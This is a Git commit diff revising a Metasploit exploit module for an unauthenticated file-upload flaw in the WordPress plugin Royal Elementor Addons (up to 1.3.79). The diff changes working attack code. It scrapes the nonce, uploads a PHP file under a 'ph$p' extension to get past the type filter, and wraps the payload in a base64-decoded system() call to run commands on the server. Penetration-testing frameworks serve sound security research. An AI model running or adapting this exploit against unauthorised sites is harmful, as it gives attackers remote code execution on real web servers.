Add suggested changes
This commit is contained in:
parent
31daaf58fe
commit
65ea1188e2
|
@ -59,3 +59,4 @@ bookingpress
|
|||
paid-memberships-pro
|
||||
woocommerce-payments
|
||||
file-manager-advanced-shortcode
|
||||
royal-elementor-addons
|
||||
|
|
|
@ -32,6 +32,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Targets' => [['Automatic', {}]],
|
||||
'DisclosureDate' => '2023-11-23',
|
||||
'DefaultTarget' => 0,
|
||||
'DefaultOptions' => {
|
||||
'SSL' => true,
|
||||
'RPORT' => 443
|
||||
},
|
||||
'Privileged' => false,
|
||||
'Notes' => {
|
||||
'Stability' => [CRASH_SAFE],
|
||||
|
@ -40,12 +44,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
}
|
||||
)
|
||||
)
|
||||
|
||||
register_options([
|
||||
OptString.new('TARGETURI', [true, 'The base path to the WordPress application', '/']),
|
||||
OptBool.new('SSL', [true, 'Use SSL/TLS connection', true]),
|
||||
Opt::RPORT(443)
|
||||
])
|
||||
end
|
||||
|
||||
def check
|
||||
|
@ -56,13 +54,13 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
check_code = check_plugin_version_from_readme('royal-elementor-addons', '1.3.79')
|
||||
|
||||
if check_code.code == 'appears'
|
||||
plugin_version = check_code.details[:version]
|
||||
print_good("Detected Royal Elementor Addons version: #{plugin_version}")
|
||||
return CheckCode::Appears
|
||||
if check_code.code != 'appears'
|
||||
return CheckCode::Safe
|
||||
end
|
||||
|
||||
return CheckCode::Safe
|
||||
plugin_version = check_code.details[:version]
|
||||
print_good("Detected Royal Elementor Addons version: #{plugin_version}")
|
||||
return CheckCode::Appears
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
@ -74,15 +72,15 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
data = {
|
||||
'action' => 'wpr_addons_upload_file',
|
||||
'max_file_size' => 0,
|
||||
'max_file_size' => rand(10001),
|
||||
'allowed_file_types' => 'ph$p',
|
||||
'triggering_event' => 'click',
|
||||
'wpr_addons_nonce' => nonce
|
||||
}
|
||||
|
||||
file_content = '<?php '
|
||||
file_content << (payload_instance.arch.include?(ARCH_PHP) ? payload.encoded : "system('#{payload.encoded}');")
|
||||
file_content << ' ?>'
|
||||
file_content << (payload_instance.arch.include?(ARCH_PHP) ? payload.encoded : "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));")
|
||||
file_content << '?>'
|
||||
|
||||
file_name = "#{Rex::Text.rand_text_alphanumeric(8)}.ph$p"
|
||||
|
||||
|
@ -128,7 +126,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
fail_with(Failure::Unreachable, 'No response received from the target') if res.nil?
|
||||
fail_with(Failure::UnexpectedReply, "Unexpected HTTP response code from the target: #{res.code}") if res.code != 200
|
||||
|
||||
match = res.body.match(/var\s+WprConfig\s*=\s*({.*?});/)
|
||||
match = res.body.match(/var\s+WprConfig\s*=\s*({.+?});/)
|
||||
fail_with(Failure::NoTarget, 'Nonce not found in the response.') if match.nil? || match[1].nil?
|
||||
|
||||
nonce = JSON.parse(match[1])['nonce']
|
||||
|
|
Loading…
Reference in New Issue